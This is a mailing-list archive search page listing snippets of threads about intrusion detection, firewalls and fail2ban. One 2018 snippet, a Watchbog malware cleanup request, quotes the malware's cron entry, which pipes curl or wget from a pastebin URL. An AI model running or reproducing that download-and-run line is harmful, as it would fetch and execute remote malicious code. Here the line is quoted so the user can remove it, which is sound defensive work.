similar to: new intrusion detection system

Displaying 20 results from an estimated 10000 matches similar to: "new intrusion detection system"

2004 Oct 19
2
intrusion detection system
Hello to all, I have implemented a new type of intrusion detection system for my Master's thesis. I would like to announce this information, in case anyone would be interested in this research. The IDS system is designed as a kernel module for FreeBSD 5.2. It is inspired by the SpamAssassin program, which detects spam by applying a set of tests to every email message and counting a sum of
2010 Mar 04
8
Intrusion Detection
Hello all, I have been exploring the various intrusion detection systems available for the Linux platform and was wondering what ones you all would recommend? I have used AIDE before and while it is extremely easy to set up, it does not support the ability to send alerts as files are changed (allows one to be aware of an intrusion almost immediately). Thank you, Dan Burkland
2006 Apr 25
2
firewall based antivirus/trojan blocking and intrusion detection [dnk]
Can anyone recommend an opensource package (preferably something centos 4X compatible) that can be used on a (iptables) firewall to block virus/trojan, etc? And maybe something for intrusion detection? Thanks! Dnk
2020 Apr 22
6
Recommendations on intrusion prevention/detection?
Dear all, what are the key strategies for intrusion prevention and detection with dovecot, apart from installing fail2ban? It is a pity that the IMAP protocol does not support 2 factor authentication, which seems to stop 90% of intrusion attempts in their tracks. Without it, if someone has obtained your password and reads your mail without modifying it, you will hardly ever notice. Is there a
2004 Oct 13
1
follow-up on ISA intrusion detection
Hi, I wrote a mail a few days ago concerning my setup with a front/back firewall, shorewall being front and ISA server 2004 acting as back firewall. I said that ISA server is logging some "intrusion attempts" namely requests coming from external interface to the internal network. As this shouldn't happen (all intrusion attempts should be stopped by shorewall) I began to
2020 Apr 22
2
Recommendations on intrusion prevention/detection?
Usually I use pfsense as main firewall with snort blocking all kind of scans and others. Fail2ban triggering after 3 unsuccessful tries and for last iptables if Linux or ipfw If Freebsd
2008 Jan 03
4
iptables
Hi All, I am running iptables on centos 4.5 and 5 boxes. Now, I have requirements to enable below features. Gateway level antivirus, anti spyware and intrusion preventions, content filtering, etc. I googled a bit. But still no luck to find proper Docs to enable these. Can Iptables meet these features? If possible, Pls let me know some documentations that say how to set up these. Hope to
2007 Sep 26
4
Intrusion Detection Systems
Situation: We are providing hosting services. I've grown tired of the various kiddie scripts/dictionary attacks on various services. The latest has been against vsftpd, on systems that I can't easily control vs. putting strict limits on ssh. We simply have too many users entering from too many networks many with dynamic IP addresses. Enter.... thinking about LIDS or Log Based
2018 Dec 15
7
CentOS 7.5 Linux box got infected with Watchbog malware
Hi, Is there a way to find out how the CentOS 7.5 Linux box got infected with malware? Currently I am referring to http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html to carry out the below steps and is done manually. 1)rm -fr /tmp/*timesyncc.service* 2)crontab -e -u apigee delete the cron entry */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget
2005 Jan 07
3
Intrusion Suspected, Advice Sought
I run OS X 10.3.7 on a PowerMac MDD G4 on a cable broadband connection. I have reason to think my system has been tampered with. Security features in Mac OS X have been left unlocked (Preference Pane - Users) even though a master lock has always been set in the Security Preference Pane. This locks all other important preference panes which could be tampered with. Also permissions have been
2020 Apr 22
0
Recommendations on intrusion prevention/detection?
On 2020-04-22 5:29 a.m., Johannes Rohr wrote: > Dear all, > > what are the key strategies for intrusion prevention and detection with > dovecot, apart from installing fail2ban? > It is a pity that the IMAP protocol does not support 2 factor > authentication, which seems to stop 90% of intrusion attempts in their > tracks. Without it, if someone has obtained your password and
1999 Jul 28
6
You got some 'splaininn to do Lucy ;-)
We just had a security application vendor come in. We asked about Linux support and he said that putting a security application on top of an insecure OS was useless. When I asked what he meant by insecure he replied that Linux does not have a true Auditing capability - as opposed to HP-UX & Solaris which they do support. Can anyone explain to me what he was talking about? Thanks, Marty
2014 Feb 08
0
Asterisk intrusion detection/prevention, geographic IP banning, etc. (new software)
I'm looking for some beta testers to provide feedback on an Asterisk intrusion detection & prevention program we're releasing soon. As a quick overview, the program provides: - banning based on geographic location of source IP (Continent, country, region, city, etc) - detection and banning based on channels in use by a user - detection and banning based on rate of dialing - detection
2020 Apr 22
0
Recommendations on intrusion prevention/detection?
On 2020-04-22 18:45, Sami Ketola wrote: > Actually by far the biggest source of stolen credentials is > viruses/trojans harvesting them. I tried to blacklist all IPs that got password errors, but that ends in big shorewall blrules so I turn it over to just add whitelist into blrules where IPs are known customers that don't abuse server, that way my shorewall got a lot smaller config files
2020 Apr 22
1
Recommendations on intrusion prevention/detection?
On 22/04/2020 19:56 Benny Pedersen <me@junc.eu> wrote:
2020 Apr 22
2
Recommendations on intrusion prevention/detection?
> On 22. Apr 2020, at 19.14, Michael Peddemors <michael at linuxmagic.com> wrote: > The three most common attack vectors, (and attack volumes have never been higher) are: > > * Sniffed unencrypted credentials > (Assume every home wifi router and CPE equipment are compromised ;) > * Re-used passwords where data is exposed from another site's breach > (Users WANT to
2020 Apr 22
0
Recommendations on intrusion prevention/detection?
Iptables or ipfw you always can create tables / chains and feed those with desirable IP's to ban. Something like fail2ban does. Make a big list, remove one or other IP. On my setup, I
2012 Apr 24
4
[LLVMdev] Tool for loop transformations
Hi everyone! I would like to create a tool which would "simulate" several loop transformations. It should serve as a part of my bachelor thesis. Typical usage of that tool would be this: Mark a loop in a source (probably C/C++) file and specify desired transformation in a predefined way (for example a special comment or something). -> Run the tool on that "crafted"
2006 Jan 19
1
Attempted intrusions
I have noticed since commencing posts on this newsgroup, that there has been a significant increase in attempted intrusions, especially port 80. It's a pity that IP addresses are in the NG headers. :) Oygle
2005 Mar 07
22
tripwire
Tripwire is probably one of the must-have utilities for many system administrators. However, it is missing from almost all recent Red Hattish distributions. IMO, probably due to the fact that source compiles only on i386, and needs patches to compile almost every time a new major version of gcc is released. However, in absence of good replacement, this is all we have. (IMO, other tools such as AIDE